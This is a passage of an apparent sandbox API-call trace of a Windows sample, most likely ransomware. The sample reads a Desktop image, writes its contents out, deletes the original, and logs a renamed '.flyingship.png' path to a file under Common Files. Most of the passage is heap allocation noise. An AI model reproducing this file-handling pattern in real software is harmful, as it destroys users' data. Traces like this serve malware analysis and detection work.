dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0158.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0158.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0158.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0158.401] WriteFile (in: hFile=0x120, lpBuffer=0x9c5180*, nNumberOfBytesToWrite=0xe652, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesWritten=0x87eae0*=0xe652, lpOverlapped=0x0) returned 1 [0158.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0158.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0158.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0158.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0158.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0158.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0158.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0158.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0158.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0158.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0158.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0158.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0158.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0158.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0158.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0158.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0158.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0158.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0158.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0158.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0158.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0158.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0158.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0158.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0158.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0158.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0158.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0158.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0158.404] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0158.404] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0158.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0158.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0158.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0158.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0158.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0158.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0158.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0158.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0158.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0158.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0158.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0158.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0158.405] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0158.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0158.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0158.405] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0158.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.405] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0158.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.405] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0158.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0158.406] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0158.406] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0158.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0158.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0158.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0158.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0158.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0158.406] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0158.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0158.406] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0158.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0158.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0158.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0158.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd9d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0158.409] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.409] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0158.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0158.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0158.409] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0158.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0158.409] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0158.410] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0158.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0158.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0158.410] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0158.410] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bQ9gmgo1CPU5L0JTf.png", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bQ9gmgo1CPU5L0JTf.png", lpFilePart=0x0) returned 0x3b [0158.411] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bQ9gmgo1CPU5L0JTf.png", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfee06400, ftCreationTime.dwHighDateTime=0x1d5d866, ftLastAccessTime.dwLowDateTime=0x9c0fa5c0, ftLastAccessTime.dwHighDateTime=0x1d5db77, ftLastWriteTime.dwLowDateTime=0x3e71a30, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xe652, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="bQ9gmgo1CPU5L0JTf.png", cAlternateFileName="BQ9GMG~1.PNG")) returned 0x90af58 [0158.411] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bQ9gmgo1CPU5L0JTf.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bq9gmgo1cpu5l0jtf.png")) returned 1 [0158.416] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfee06400, ftCreationTime.dwHighDateTime=0x1d5d866, ftLastAccessTime.dwLowDateTime=0x9c0fa5c0, ftLastAccessTime.dwHighDateTime=0x1d5db77, ftLastWriteTime.dwLowDateTime=0x3e71a30, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xe652, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="bQ9gmgo1CPU5L0JTf.png", cAlternateFileName="BQ9GMG~1.PNG")) returned 0 [0158.416] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0158.417] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.417] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0158.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0158.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0158.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0158.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0158.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0158.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0158.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0158.417] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0158.417] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0158.418] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0158.418] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0158.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0158.418] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0158.418] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0158.418] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0158.418] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0158.418] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0158.418] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0158.418] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.418] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0158.419] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.419] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0158.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0158.419] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0158.419] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x4f3, lpOverlapped=0x0) returned 1 [0158.422] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0158.422] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x4f3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.422] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0158.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0158.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bQ9gmgo1CPU5L0JTf.flyingship.png\r\n", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0158.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bQ9gmgo1CPU5L0JTf.flyingship.png\r\n", cchWideChar=73, lpMultiByteStr=0x923b28, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bQ9gmgo1CPU5L0JTf.flyingship.png\r\n", lpUsedDefaultChar=0x0) returned 73 [0158.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0158.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0158.423] WriteFile (in: hFile=0x120, lpBuffer=0x923ad0*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923ad0*, lpNumberOfBytesWritten=0x87f43c*=0x48, lpOverlapped=0x0) returned 1 [0158.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0158.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0158.423] CloseHandle (hObject=0x120) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0158.424] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0158.424] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0158.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0158.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: 